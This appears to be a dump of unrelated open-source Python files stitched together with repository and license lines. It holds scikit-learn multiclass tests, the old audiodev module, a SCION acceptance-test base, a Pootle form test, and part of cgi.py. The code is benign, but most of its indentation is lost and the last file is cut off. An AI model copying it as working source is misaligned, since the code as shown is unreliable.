X = np.eye(4)
y = np.array(['a'] * 4)
ovo = OneVsOneClassifier(LinearSVC())
msg = "when only one class"
with pytest.raises(ValueError, match=msg):
ovo.fit(X, y)
def test_ovo_float_y():
# Test that the OvO errors on float targets
X = iris.data
y = iris.data[:, 0]
ovo = OneVsOneClassifier(LinearSVC())
msg = "Unknown label type"
with pytest.raises(ValueError, match=msg):
ovo.fit(X, y)
def test_ecoc_exceptions():
ecoc = OutputCodeClassifier(LinearSVC(random_state=0))
with pytest.raises(NotFittedError):
ecoc.predict([])
def test_ecoc_fit_predict():
# A classifier which implements decision_function.
ecoc = OutputCodeClassifier(LinearSVC(random_state=0),
code_size=2, random_state=0)
ecoc.fit(iris.data, iris.target).predict(iris.data)
assert len(ecoc.estimators_) == n_classes * 2
# A classifier which implements predict_proba.
ecoc = OutputCodeClassifier(MultinomialNB(), code_size=2, random_state=0)
ecoc.fit(iris.data, iris.target).predict(iris.data)
assert len(ecoc.estimators_) == n_classes * 2
def test_ecoc_gridsearch():
ecoc = OutputCodeClassifier(LinearSVC(random_state=0),
random_state=0)
Cs = [0.1, 0.5, 0.8]
cv = GridSearchCV(ecoc, {'estimator__C': Cs})
cv.fit(iris.data, iris.target)
best_C = cv.best_estimator_.estimators_[0].C
assert best_C in Cs
def test_ecoc_float_y():
    # Test that the ECOC errors on float targets
X = iris.data
y = iris.data[:, 0]
ovo = OutputCodeClassifier(LinearSVC())
msg = "Unknown label type"
with pytest.raises(ValueError, match=msg):
ovo.fit(X, y)
ovo = OutputCodeClassifier(LinearSVC(), code_size=-1)
msg = "code_size should be greater than 0, got -1"
with pytest.raises(ValueError, match=msg):
ovo.fit(X, y)
def test_ecoc_delegate_sparse_base_estimator():
# Non-regression test for
# https://github.com/scikit-learn/scikit-learn/issues/17218
X, y = iris.data, iris.target
X_sp = sp.csc_matrix(X)
# create an estimator that does not support sparse input
base_estimator = CheckingClassifier(
check_X=check_array,
check_X_params={"ensure_2d": True, "accept_sparse": False},
)
ecoc = OutputCodeClassifier(base_estimator, random_state=0)
with pytest.raises(TypeError, match="A sparse matrix was passed"):
ecoc.fit(X_sp, y)
ecoc.fit(X, y)
with pytest.raises(TypeError, match="A sparse matrix was passed"):
ecoc.predict(X_sp)
# smoke test to check when sparse input should be supported
ecoc = OutputCodeClassifier(LinearSVC(random_state=0))
ecoc.fit(X_sp, y).predict(X_sp)
assert len(ecoc.estimators_) == 4
def test_pairwise_indices():
clf_precomputed = svm.SVC(kernel='precomputed')
X, y = iris.data, iris.target
ovr_false = OneVsOneClassifier(clf_precomputed)
linear_kernel = np.dot(X, X.T)
ovr_false.fit(linear_kernel, y)
n_estimators = len(ovr_false.estimators_)
precomputed_indices = ovr_false.pairwise_indices_
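    # For the balanced iris data each of the 3 pairwise estimators is fit on
    # 2 of the 3 classes, i.e. on n_samples * (n_estimators - 1) / n_estimators
    # samples; the assertion below just rearranges that identity.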
for idx in precomputed_indices:
assert (idx.shape[0] * n_estimators / (n_estimators - 1) ==
linear_kernel.shape[0])
@ignore_warnings(category=FutureWarning)
def test_pairwise_attribute():
clf_precomputed = svm.SVC(kernel='precomputed')
clf_notprecomputed = svm.SVC()
for MultiClassClassifier in [OneVsRestClassifier, OneVsOneClassifier]:
ovr_false = MultiClassClassifier(clf_notprecomputed)
assert not ovr_false._pairwise
ovr_true = MultiClassClassifier(clf_precomputed)
assert ovr_true._pairwise
@pytest.mark.parametrize("MultiClassClassifier", [OneVsRestClassifier,
OneVsOneClassifier])
def test_pairwise_tag(MultiClassClassifier):
clf_precomputed = svm.SVC(kernel='precomputed')
clf_notprecomputed = svm.SVC()
ovr_false = MultiClassClassifier(clf_notprecomputed)
assert not ovr_false._get_tags()["pairwise"]
ovr_true = MultiClassClassifier(clf_precomputed)
assert ovr_true._get_tags()["pairwise"]
# TODO: Remove in 1.1
@pytest.mark.parametrize("MultiClassClassifier", [OneVsRestClassifier,
OneVsOneClassifier])
def test_pairwise_deprecated(MultiClassClassifier):
clf_precomputed = svm.SVC(kernel='precomputed')
ov_clf = MultiClassClassifier(clf_precomputed)
msg = r"Attribute _pairwise was deprecated in version 0\.24"
with pytest.warns(FutureWarning, match=msg):
ov_clf._pairwise
def test_pairwise_cross_val_score():
clf_precomputed = svm.SVC(kernel='precomputed')
clf_notprecomputed = svm.SVC(kernel='linear')
X, y = iris.data, iris.target
for MultiClassClassifier in [OneVsRestClassifier, OneVsOneClassifier]:
ovr_false = MultiClassClassifier(clf_notprecomputed)
ovr_true = MultiClassClassifier(clf_precomputed)
linear_kernel = np.dot(X, X.T)
score_precomputed = cross_val_score(ovr_true, linear_kernel, y)
score_linear = cross_val_score(ovr_false, X, y)
assert_array_equal(score_precomputed, score_linear)
@pytest.mark.parametrize("MultiClassClassifier",
[OneVsRestClassifier, OneVsOneClassifier])
# FIXME: we should move this test into `estimator_checks` once we are able
# to construct meta-estimator instances
def test_support_missing_values(MultiClassClassifier):
    # Smoke test to check that the OvR and OvO meta-classifiers delegate
    # the validation of missing values to the underlying pipeline or
    # classifiers.
rng = np.random.RandomState(42)
X, y = iris.data, iris.target
X = np.copy(X) # Copy to avoid that the original data is modified
mask = rng.choice([1, 0], X.shape, p=[.1, .9]).astype(bool)
X[mask] = np.nan
lr = make_pipeline(SimpleImputer(),
LogisticRegression(random_state=rng))
MultiClassClassifier(lr).fit(X, y).score(X, y)
| bsd-3-clause |
mchristopher/PokemonGo-DesktopMap | app/pywin/Lib/audiodev.py | 286 | 7597 | """Classes for manipulating audio devices (currently only for Sun and SGI)"""
from warnings import warnpy3k
warnpy3k("the audiodev module has been removed in Python 3.0", stacklevel=2)
del warnpy3k
__all__ = ["error","AudioDev"]
class error(Exception):
pass
class Play_Audio_sgi:
# Private instance variables
## if 0: access frameratelist, nchannelslist, sampwidthlist, oldparams, \
## params, config, inited_outrate, inited_width, \
## inited_nchannels, port, converter, classinited: private
classinited = 0
frameratelist = nchannelslist = sampwidthlist = None
def initclass(self):
import AL
self.frameratelist = [
(48000, AL.RATE_48000),
(44100, AL.RATE_44100),
(32000, AL.RATE_32000),
(22050, AL.RATE_22050),
(16000, AL.RATE_16000),
(11025, AL.RATE_11025),
( 8000, AL.RATE_8000),
]
self.nchannelslist = [
(1, AL.MONO),
(2, AL.STEREO),
(4, AL.QUADRO),
]
self.sampwidthlist = [
(1, AL.SAMPLE_8),
(2, AL.SAMPLE_16),
(3, AL.SAMPLE_24),
]
self.classinited = 1
def __init__(self):
import al, AL
if not self.classinited:
self.initclass()
self.oldparams = []
self.params = [AL.OUTPUT_RATE, 0]
self.config = al.newconfig()
self.inited_outrate = 0
self.inited_width = 0
self.inited_nchannels = 0
self.converter = None
self.port = None
return
def __del__(self):
if self.port:
self.stop()
if self.oldparams:
import al, AL
al.setparams(AL.DEFAULT_DEVICE, self.oldparams)
self.oldparams = []
def wait(self):
if not self.port:
return
import time
while self.port.getfilled() > 0:
time.sleep(0.1)
self.stop()
def stop(self):
if self.port:
self.port.closeport()
self.port = None
if self.oldparams:
import al, AL
al.setparams(AL.DEFAULT_DEVICE, self.oldparams)
self.oldparams = []
def setoutrate(self, rate):
for (raw, cooked) in self.frameratelist:
if rate == raw:
self.params[1] = cooked
self.inited_outrate = 1
break
else:
raise error, 'bad output rate'
def setsampwidth(self, width):
for (raw, cooked) in self.sampwidthlist:
if width == raw:
self.config.setwidth(cooked)
self.inited_width = 1
break
else:
if width == 0:
import AL
self.inited_width = 0
self.config.setwidth(AL.SAMPLE_16)
self.converter = self.ulaw2lin
else:
raise error, 'bad sample width'
def setnchannels(self, nchannels):
for (raw, cooked) in self.nchannelslist:
if nchannels == raw:
self.config.setchannels(cooked)
self.inited_nchannels = 1
break
else:
raise error, 'bad # of channels'
def writeframes(self, data):
if not (self.inited_outrate and self.inited_nchannels):
raise error, 'params not specified'
if not self.port:
import al, AL
self.port = al.openport('Python', 'w', self.config)
self.oldparams = self.params[:]
al.getparams(AL.DEFAULT_DEVICE, self.oldparams)
al.setparams(AL.DEFAULT_DEVICE, self.params)
if self.converter:
data = self.converter(data)
self.port.writesamps(data)
def getfilled(self):
if self.port:
return self.port.getfilled()
else:
return 0
def getfillable(self):
if self.port:
return self.port.getfillable()
else:
return self.config.getqueuesize()
# private methods
## if 0: access *: private
def ulaw2lin(self, data):
import audioop
return audioop.ulaw2lin(data, 2)
class Play_Audio_sun:
## if 0: access outrate, sampwidth, nchannels, inited_outrate, inited_width, \
## inited_nchannels, converter: private
def __init__(self):
self.outrate = 0
self.sampwidth = 0
self.nchannels = 0
self.inited_outrate = 0
self.inited_width = 0
self.inited_nchannels = 0
self.converter = None
self.port = None
return
def __del__(self):
self.stop()
def setoutrate(self, rate):
self.outrate = rate
self.inited_outrate = 1
def setsampwidth(self, width):
self.sampwidth = width
self.inited_width = 1
def setnchannels(self, nchannels):
self.nchannels = nchannels
self.inited_nchannels = 1
def writeframes(self, data):
if not (self.inited_outrate and self.inited_width and self.inited_nchannels):
raise error, 'params not specified'
if not self.port:
import sunaudiodev, SUNAUDIODEV
self.port = sunaudiodev.open('w')
info = self.port.getinfo()
info.o_sample_rate = self.outrate
info.o_channels = self.nchannels
if self.sampwidth == 0:
info.o_precision = 8
self.o_encoding = SUNAUDIODEV.ENCODING_ULAW
# XXX Hack, hack -- leave defaults
else:
info.o_precision = 8 * self.sampwidth
info.o_encoding = SUNAUDIODEV.ENCODING_LINEAR
self.port.setinfo(info)
if self.converter:
data = self.converter(data)
self.port.write(data)
def wait(self):
if not self.port:
return
self.port.drain()
self.stop()
def stop(self):
if self.port:
self.port.flush()
self.port.close()
self.port = None
def getfilled(self):
if self.port:
return self.port.obufcount()
else:
return 0
## # Nobody remembers what this method does, and it's broken. :-(
## def getfillable(self):
## return BUFFERSIZE - self.getfilled()
def AudioDev():
# Dynamically try to import and use a platform specific module.
try:
import al
except ImportError:
try:
import sunaudiodev
return Play_Audio_sun()
except ImportError:
try:
import Audio_mac
except ImportError:
raise error, 'no audio device'
else:
return Audio_mac.Play_Audio_mac()
else:
return Play_Audio_sgi()
def test(fn = None):
import sys
if sys.argv[1:]:
fn = sys.argv[1]
else:
fn = 'f:just samples:just.aif'
import aifc
af = aifc.open(fn, 'r')
print fn, af.getparams()
p = AudioDev()
p.setoutrate(af.getframerate())
p.setsampwidth(af.getsampwidth())
p.setnchannels(af.getnchannels())
BUFSIZ = af.getframerate()/af.getsampwidth()/af.getnchannels()
while 1:
data = af.readframes(BUFSIZ)
if not data: break
print len(data)
p.writeframes(data)
p.wait()
if __name__ == '__main__':
test()
| mit |
Oncilla/scion | acceptance/common/base.py | 1 | 7373 | # Copyright 2019 Anapaya Systems
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import re
import typing
from plumbum import cli
from plumbum import local
from plumbum import cmd
from plumbum import path
from acceptance.common.docker import Compose
from acceptance.common.log import LogExec
from acceptance.common.scion import SCION, SCIONSupervisor
NAME = 'NOT_SET' # must be set by users of the Base class.
DIR = 'NOT_SET'
logger = logging.getLogger(__name__)
def set_name(file: str):
global NAME
global DIR
DIR = local.path(file).dirname.name
NAME = DIR[:-len('_acceptance')]
class TestState:
"""
TestState is used to share state between the command
and the sub-command.
"""
artifacts = None
def __init__(self, scion: SCION, dc: Compose):
"""
Create new environment state for an execution of the acceptance
testing framework. Plumbum subcommands can access this state
via the parent to retrieve information about the test environment.
"""
self.scion = scion
self.dc = dc
self.topology_tar = ""
self.containers_tar = ""
if 'TEST_UNDECLARED_OUTPUTS_DIR' in os.environ:
self.artifacts = local.path(os.environ['TEST_UNDECLARED_OUTPUTS_DIR'])
else:
self.artifacts = local.path("/tmp/artifacts-scion")
self.dc.compose_file = self.artifacts / 'gen/scion-dc.yml'
self.no_docker = False
self.tools_dc = local['./tools/dc']
class TestBase(cli.Application):
"""
TestBase is used to implement the test entry point. Tests should
sub-class it and only define the doc string.
"""
test_state = None # type: TestState
@cli.switch('disable-docker', envname='DISABLE_DOCKER',
help='Run in supervisor environment.')
def disable_docker(self):
self.test_state.no_docker = True
self.test_state.scion = SCIONSupervisor()
@cli.switch('artifacts', str, envname='ACCEPTANCE_ARTIFACTS',
help='Artifacts directory (for legacy tests)')
def artifacts_dir(self, a_dir: str):
self.test_state.artifacts = local.path('%s/%s/' % (a_dir, NAME))
@cli.switch('artifacts_dir', str, help='Artifacts directory (for bazel tests)')
def artifacts_dir_new(self, a_dir: str):
self.test_state.artifacts = local.path(a_dir)
self.test_state.dc.compose_file = self.test_state.artifacts / 'gen/scion-dc.yml'
@cli.switch('topology_tar', str, help="The tarball with the topology files")
def topology_tar(self, tar: str):
self.test_state.topology_tar = tar
@cli.switch('containers_tar', str, help="The tarball with the containers")
def containers_tar(self, tar: str):
self.test_state.containers_tar = tar
@cli.switch('bazel_rule', str, help="The bazel rule that triggered the test")
def test_type(self, rule: str):
self.test_state.bazel_rule = rule
def _unpack_topo(self):
cmd.tar('-xf', self.test_state.topology_tar, '-C', self.test_state.artifacts)
cmd.sed('-i', 's#$SCIONROOT#%s#g' % self.test_state.artifacts,
self.test_state.artifacts / 'gen/scion-dc.yml')
self.test_state.dc.compose_file = self.test_state.artifacts / 'gen/scion-dc.yml'
def setup_prepare(self):
"""Unpacks the topology and loads local docker images.
"""
# Delete old artifacts, if any.
cmd.rm("-rf", self.test_state.artifacts)
cmd.mkdir(self.test_state.artifacts)
print('artifacts dir: %s' % self.test_state.artifacts)
self._unpack_topo()
print(cmd.docker('image', 'load', '-i', self.test_state.containers_tar))
def setup(self):
self.setup_prepare()
self.setup_start()
def setup_start(self):
"""Starts the docker containers in the topology.
"""
print(self.test_state.dc('up', '-d'))
print(self.test_state.dc('ps'))
def teardown(self):
out_dir = self.test_state.artifacts / 'logs'
self.test_state.dc.collect_logs(out_dir=out_dir)
ps = self.test_state.dc('ps')
print(self.test_state.dc('down', '-v'))
if re.search(r"Exit\s+[1-9]\d*", ps):
raise Exception("Failed services.\n" + ps)
def send_signal(self, container, signal):
"""Sends signal to a container.
Args:
container: the name of the container.
signal: the signal to send
"""
print(self.test_state.dc("kill", "-s", signal, container))
class CmdBase(cli.Application):
""" CmdBase is used to implement the test sub-commands. """
tools_dc = local['./tools/dc']
def cmd_dc(self, *args):
for line in self.dc(*args).splitlines():
print(line)
def cmd_setup(self):
cmd.mkdir('-p', self.artifacts)
def cmd_teardown(self):
if not self.no_docker:
self.dc.collect_logs(self.artifacts / 'logs' / 'docker')
self.tools_dc('down')
self.scion.stop()
def _collect_logs(self, name: str):
if path.local.LocalPath('gen/%s-dc.yml' % name).exists():
self.tools_dc('collect_logs', name, self.artifacts / 'logs' / 'docker')
def _teardown(self, name: str):
if path.local.LocalPath('gen/%s-dc.yml' % name).exists():
self.tools_dc(name, 'down')
@staticmethod
def test_dir(prefix: str = '', directory: str = 'acceptance') -> path.local.LocalPath:
return local.path(prefix, directory) / DIR
@staticmethod
def docker_status():
logger.info('Docker containers')
print(cmd.docker('ps', '-a', '-s'))
@property
def dc(self):
return self.parent.test_state.dc
@property
def artifacts(self):
return self.parent.test_state.artifacts
@property
def scion(self):
return self.parent.test_state.scion
@property
def no_docker(self):
return self.parent.test_state.no_docker
@TestBase.subcommand('name')
class TestName(CmdBase):
def main(self):
print(NAME)
@TestBase.subcommand('teardown')
class TestTeardown(CmdBase):
"""
    Tear down the topology by stopping all running services.
In a dockerized topology, the logs are collected.
"""
@LogExec(logger, 'teardown')
def main(self):
self.cmd_teardown()
def register_commands(c: typing.Type[TestBase]):
"""
Registers the default subcommands to the test class c.
"""
class TestSetup(c):
def main(self):
self.setup()
class TestRun(c):
def main(self):
self._run()
class TestTeardown(c):
def main(self):
self.teardown()
c.subcommand("setup", TestSetup)
c.subcommand("run", TestRun)
c.subcommand("teardown", TestTeardown)
| apache-2.0 |
unho/pootle | tests/pootle_app/forms.py | 5 | 1571 | # -*- coding: utf-8 -*-
#
# Copyright (C) Pootle contributors.
#
# This file is a part of the Pootle project. It is distributed under the GPL3
# or later license. See the LICENSE file for a copy of the license and the
# AUTHORS file for copyright and authorship information.
import pytest
from pootle_app.forms import PermissionsUsersSearchForm
from pootle_app.models.permissions import PermissionSet, get_pootle_permission
@pytest.mark.django_db
def test_form_permissions_users(project0, member, member2):
# must supply a directory
with pytest.raises(KeyError):
PermissionsUsersSearchForm()
form = PermissionsUsersSearchForm(
directory=project0.directory, data={})
assert not form.is_valid()
assert "q" in form.errors
form = PermissionsUsersSearchForm(
directory=project0.directory,
data=dict(q="mem"))
assert form.is_valid()
assert form.cleaned_data == dict(q="mem")
results = form.search()["results"]
assert results[0]['text'] == member.username
assert results[0]['id'] == member.pk
assert results[1]['text'] == member2.username
assert results[1]['id'] == member2.pk
# providing a user with permissions in this directory
# means they are excluded from search results
view = get_pootle_permission('view')
perm_set = PermissionSet.objects.create(
user=member,
directory=project0.directory)
perm_set.positive_permissions.add(view)
assert form.search() == {
'results': [
{'text': member2.username, 'id': member2.pk}]}
| gpl-3.0 |
glwu/python-for-android | python3-alpha/python3-src/Lib/cgi.py | 46 | 34484 | #! /usr/local/bin/python
# NOTE: the above "/usr/local/bin/python" is NOT a mistake. It is
# intentionally NOT "/usr/bin/env python". On many systems
# (e.g. Solaris), /usr/local/bin is not in $PATH as passed to CGI
# scripts, and /usr/local/bin is the default directory where Python is
# installed, so /usr/bin/env would be unable to find python. Granted,
# binary installations by Linux vendors often install Python in
# /usr/bin. So let those vendors patch cgi.py to match their choice
# of installation.
"""Support module for CGI (Common Gateway Interface) scripts.
This module defines a number of utilities for use by CGI scripts
written in Python.
"""
# History
# -------
#
# Michael McLay started this module. Steve Majewski changed the
# interface to SvFormContentDict and FormContentDict. The multipart
# parsing was inspired by code submitted by Andreas Paepcke. Guido van
# Rossum rewrote, reformatted and documented the module and is currently
# responsible for its maintenance.
#
__version__ = "2.6"
# Imports
# =======
from io import StringIO, BytesIO, TextIOWrapper
import sys
import os
import urllib.parse
from email.parser import FeedParser
from warnings import warn
import html
import locale
import tempfile
__all__ = ["MiniFieldStorage", "FieldStorage",
"parse", "parse_qs", "parse_qsl", "parse_multipart",
"parse_header", "print_exception", "print_environ",
"print_form", "print_directory", "print_arguments",
"print_environ_usage", "escape"]
# Logging support
# ===============
logfile = "" # Filename to log to, if not empty
logfp = None # File object to log to, if not None
def initlog(*allargs):
"""Write a log message, if there is a log file.
Even though this function is called initlog(), you should always
use log(); log is a variable that is set either to initlog
(initially), to dolog (once the log file has been opened), or to
nolog (when logging is disabled).
The first argument is a format string; the remaining arguments (if
any) are arguments to the % operator, so e.g.
log("%s: %s", "a", "b")
will write "a: b" to the log file, followed by a newline.
If the global logfp is not None, it should be a file object to
which log data is written.
If the global logfp is None, the global logfile may be a string
giving a filename to open, in append mode. This file should be
world writable!!! If the file can't be opened, logging is
silently disabled (since there is no safe place where we could
send an error message).
"""
global logfp, log
if logfile and not logfp:
try:
logfp = open(logfile, "a")
except IOError:
pass
if not logfp:
log = nolog
else:
log = dolog
log(*allargs)
def dolog(fmt, *args):
"""Write a log message to the log file. See initlog() for docs."""
logfp.write(fmt%args + "\n")
def nolog(*allargs):
"""Dummy function, assigned to log when logging is disabled."""
pass
log = initlog # The current logging function
# Parsing functions
# =================
# Maximum input we will accept when REQUEST_METHOD is POST
# 0 ==> unlimited input
maxlen = 0
def parse(fp=None, environ=os.environ, keep_blank_values=0, strict_parsing=0):
"""Parse a query in the environment or from a file (default stdin)
Arguments, all optional:
fp : file pointer; default: sys.stdin.buffer
environ : environment dictionary; default: os.environ
keep_blank_values: flag indicating whether blank values in
percent-encoded forms should be treated as blank strings.
A true value indicates that blanks should be retained as
blank strings. The default false value indicates that
blank values are to be ignored and treated as if they were
not included.
strict_parsing: flag indicating what to do with parsing errors.
If false (the default), errors are silently ignored.
If true, errors raise a ValueError exception.
"""
if fp is None:
fp = sys.stdin
# field keys and values (except for files) are returned as strings
# an encoding is required to decode the bytes read from self.fp
if hasattr(fp,'encoding'):
encoding = fp.encoding
else:
encoding = 'latin-1'
# fp.read() must return bytes
if isinstance(fp, TextIOWrapper):
fp = fp.buffer
    if 'REQUEST_METHOD' not in environ:
environ['REQUEST_METHOD'] = 'GET' # For testing stand-alone
if environ['REQUEST_METHOD'] == 'POST':
ctype, pdict = parse_header(environ['CONTENT_TYPE'])
if ctype == 'multipart/form-data':
return parse_multipart(fp, pdict)
elif ctype == 'application/x-www-form-urlencoded':
clength = int(environ['CONTENT_LENGTH'])
if maxlen and clength > maxlen:
raise ValueError('Maximum content length exceeded')
qs = fp.read(clength).decode(encoding)
else:
qs = '' # Unknown content-type
if 'QUERY_STRING' in environ:
if qs: qs = qs + '&'
qs = qs + environ['QUERY_STRING']
elif sys.argv[1:]:
if qs: qs = qs + '&'
qs = qs + sys.argv[1]
environ['QUERY_STRING'] = qs # XXX Shouldn't, really
elif 'QUERY_STRING' in environ:
qs = environ['QUERY_STRING']
else:
if sys.argv[1:]:
qs = sys.argv[1]
else:
qs = ""
environ['QUERY_STRING'] = qs # XXX Shouldn't, really
return urllib.parse.parse_qs(qs, keep_blank_values, strict_parsing,
encoding=encoding)
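# A minimal usage sketch for parse() handling a GET request (the environ
# mapping is illustrative; a real CGI script receives these variables from
# the web server):
#
#     env = {'REQUEST_METHOD': 'GET', 'QUERY_STRING': 'name=Ada&lang=python'}
#     form = parse(environ=env)
#     # form == {'name': ['Ada'], 'lang': ['python']}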
# Query string parsing functions kept for backward compatibility;
# they now simply delegate to urllib.parse.
def parse_qs(qs, keep_blank_values=0, strict_parsing=0):
"""Parse a query given as a string argument."""
warn("cgi.parse_qs is deprecated, use urllib.parse.parse_qs instead",
DeprecationWarning, 2)
return urllib.parse.parse_qs(qs, keep_blank_values, strict_parsing)
def parse_qsl(qs, keep_blank_values=0, strict_parsing=0):
"""Parse a query given as a string argument."""
warn("cgi.parse_qsl is deprecated, use urllib.parse.parse_qsl instead",
DeprecationWarning, 2)
return urllib.parse.parse_qsl(qs, keep_blank_values, strict_parsing)
def parse_multipart(fp, pdict):
"""Parse multipart input.
Arguments:
fp : input file
pdict: dictionary containing other parameters of content-type header
Returns a dictionary just like parse_qs(): keys are the field names, each
value is a list of values for that field. This is easy to use but not
much good if you are expecting megabytes to be uploaded -- in that case,
use the FieldStorage class instead which is much more flexible. Note
that content-type is the raw, unparsed contents of the content-type
header.
XXX This does not parse nested multipart parts -- use FieldStorage for
that.
XXX This should really be subsumed by FieldStorage altogether -- no
point in having two implementations of the same parsing algorithm.
Also, FieldStorage protects itself better against certain DoS attacks
by limiting the size of the data read in one chunk. The API here
does not support that kind of protection. This also affects parse()
since it can call parse_multipart().
"""
import http.client
boundary = ""
if 'boundary' in pdict:
boundary = pdict['boundary']
if not valid_boundary(boundary):
raise ValueError('Invalid boundary in multipart form: %r'
% (boundary,))
nextpart = "--" + boundary
lastpart = "--" + boundary + "--"
partdict = {}
terminator = ""
while terminator != lastpart:
bytes = -1
data = None
if terminator:
# At start of next part. Read headers first.
headers = http.client.parse_headers(fp)
clength = headers.get('content-length')
if clength:
try:
bytes = int(clength)
except ValueError:
pass
if bytes > 0:
if maxlen and bytes > maxlen:
raise ValueError('Maximum content length exceeded')
data = fp.read(bytes)
else:
data = ""
# Read lines until end of part.
lines = []
while 1:
line = fp.readline()
if not line:
terminator = lastpart # End outer loop
break
if line.startswith("--"):
terminator = line.rstrip()
if terminator in (nextpart, lastpart):
break
lines.append(line)
# Done with part.
if data is None:
continue
if bytes < 0:
if lines:
# Strip final line terminator
line = lines[-1]
if line[-2:] == "\r\n":
line = line[:-2]
elif line[-1:] == "\n":
line = line[:-1]
lines[-1] = line
data = "".join(lines)
line = headers['content-disposition']
if not line:
continue
key, params = parse_header(line)
if key != 'form-data':
continue
if 'name' in params:
name = params['name']
else:
continue
if name in partdict:
partdict[name].append(data)
else:
partdict[name] = [data]
return partdict
def _parseparam(s):
while s[:1] == ';':
s = s[1:]
end = s.find(';')
while end > 0 and s.count('"', 0, end) % 2:
end = s.find(';', end + 1)
if end < 0:
end = len(s)
f = s[:end]
yield f.strip()
s = s[end:]
def parse_header(line):
"""Parse a Content-type like header.
Return the main content-type and a dictionary of options.
"""
parts = _parseparam(';' + line)
key = parts.__next__()
pdict = {}
for p in parts:
i = p.find('=')
if i >= 0:
name = p[:i].strip().lower()
value = p[i+1:].strip()
if len(value) >= 2 and value[0] == value[-1] == '"':
value = value[1:-1]
value = value.replace('\\\\', '\\').replace('\\"', '"')
pdict[name] = value
return key, pdict
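# A doctest-style sketch of parse_header() (the header values are made up):
#
#     >>> parse_header('text/html; charset=utf-8')
#     ('text/html', {'charset': 'utf-8'})
#     >>> key, pd = parse_header('form-data; name="files"; filename="a b.txt"')
#     >>> key, pd['name'], pd['filename']
#     ('form-data', 'files', 'a b.txt')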
# Classes for field storage
# =========================
class MiniFieldStorage:
"""Like FieldStorage, for use when no file uploads are possible."""
# Dummy attributes
filename = None
list = None
type = None
file = None
type_options = {}
disposition = None
disposition_options = {}
headers = {}
def __init__(self, name, value):
"""Constructor from field name and value."""
self.name = name
self.value = value
# self.file = StringIO(value)
def __repr__(self):
"""Return printable representation."""
return "MiniFieldStorage(%r, %r)" % (self.name, self.value)
class FieldStorage:
"""Store a sequence of fields, reading multipart/form-data.
This class provides naming, typing, files stored on disk, and
more. At the top level, it is accessible like a dictionary, whose
keys are the field names. (Note: None can occur as a field name.)
    The items are either a Python list (if there are multiple values) or
another FieldStorage or MiniFieldStorage object. If it's a single
object, it has the following attributes:
name: the field name, if specified; otherwise None
filename: the filename, if specified; otherwise None; this is the
client side filename, *not* the file name on which it is
stored (that's a temporary file you don't deal with)
value: the value as a *string*; for file uploads, this
transparently reads the file every time you request the value
and returns *bytes*
file: the file(-like) object from which you can read the data *as
        bytes*; None if the data is stored as a simple string
type: the content-type, or None if not specified
type_options: dictionary of options specified on the content-type
line
disposition: content-disposition, or None if not specified
disposition_options: dictionary of corresponding options
headers: a dictionary(-like) object (sometimes email.message.Message or a
subclass thereof) containing *all* headers
The class is subclassable, mostly for the purpose of overriding
the make_file() method, which is called internally to come up with
a file open for reading and writing. This makes it possible to
override the default choice of storing all files in a temporary
directory and unlinking them as soon as they have been opened.
"""
def __init__(self, fp=None, headers=None, outerboundary=b'',
environ=os.environ, keep_blank_values=0, strict_parsing=0,
limit=None, encoding='utf-8', errors='replace'):
"""Constructor. Read multipart/* until last part.
Arguments, all optional:
fp : file pointer; default: sys.stdin.buffer
(not used when the request method is GET)
Can be :
1. a TextIOWrapper object
2. an object whose read() and readline() methods return bytes
headers : header dictionary-like object; default:
taken from environ as per CGI spec
outerboundary : terminating multipart boundary
(for internal use only)
environ : environment dictionary; default: os.environ
keep_blank_values: flag indicating whether blank values in
percent-encoded forms should be treated as blank strings.
A true value indicates that blanks should be retained as
blank strings. The default false value indicates that
blank values are to be ignored and treated as if they were
not included.
strict_parsing: flag indicating what to do with parsing errors.
If false (the default), errors are silently ignored.
If true, errors raise a ValueError exception.
limit : used internally to read parts of multipart/form-data forms,
to exit from the reading loop when reached. It is the difference
between the form content-length and the number of bytes already
read
encoding, errors : the encoding and error handler used to decode the
binary stream to strings. Must be the same as the charset defined
for the page sending the form (content-type : meta http-equiv or
header)
"""
method = 'GET'
self.keep_blank_values = keep_blank_values
self.strict_parsing = strict_parsing
if 'REQUEST_METHOD' in environ:
method = environ['REQUEST_METHOD'].upper()
self.qs_on_post = None
if method == 'GET' or method == 'HEAD':
if 'QUERY_STRING' in environ:
qs = environ['QUERY_STRING']
elif sys.argv[1:]:
qs = sys.argv[1]
else:
qs = ""
qs = qs.encode(locale.getpreferredencoding(), 'surrogateescape')
fp = BytesIO(qs)
if headers is None:
headers = {'content-type':
"application/x-www-form-urlencoded"}
if headers is None:
headers = {}
if method == 'POST':
# Set default content-type for POST to what's traditional
headers['content-type'] = "application/x-www-form-urlencoded"
if 'CONTENT_TYPE' in environ:
headers['content-type'] = environ['CONTENT_TYPE']
if 'QUERY_STRING' in environ:
self.qs_on_post = environ['QUERY_STRING']
if 'CONTENT_LENGTH' in environ:
headers['content-length'] = environ['CONTENT_LENGTH']
if fp is None:
self.fp = sys.stdin.buffer
# self.fp.read() must return bytes
elif isinstance(fp, TextIOWrapper):
self.fp = fp.buffer
else:
self.fp = fp
self.encoding = encoding
self.errors = errors
self.headers = headers
if not isinstance(outerboundary, bytes):
raise TypeError('outerboundary must be bytes, not %s'
% type(outerboundary).__name__)
self.outerboundary = outerboundary
self.bytes_read = 0
self.limit = limit
# Process content-disposition header
cdisp, pdict = "", {}
if 'content-disposition' in self.headers:
cdisp, pdict = parse_header(self.headers['content-disposition'])
self.disposition = cdisp
self.disposition_options = pdict
self.name = None
if 'name' in pdict:
self.name = pdict['name']
self.filename = None
if 'filename' in pdict:
self.filename = pdict['filename']
self._binary_file = self.filename is not None
# Process content-type header
#
# Honor any existing content-type header. But if there is no
# content-type header, use some sensible defaults. Assume
# outerboundary is "" at the outer level, but something non-false
# inside a multi-part. The default for an inner part is text/plain,
# but for an outer part it should be urlencoded. This should catch
# bogus clients which erroneously forget to include a content-type
# header.
#
# See below for what we do if there does exist a content-type header,
# but it happens to be something we don't understand.
if 'content-type' in self.headers:
ctype, pdict = parse_header(self.headers['content-type'])
elif self.outerboundary or method != 'POST':
ctype, pdict = "text/plain", {}
else:
ctype, pdict = 'application/x-www-form-urlencoded', {}
self.type = ctype
self.type_options = pdict
if 'boundary' in pdict:
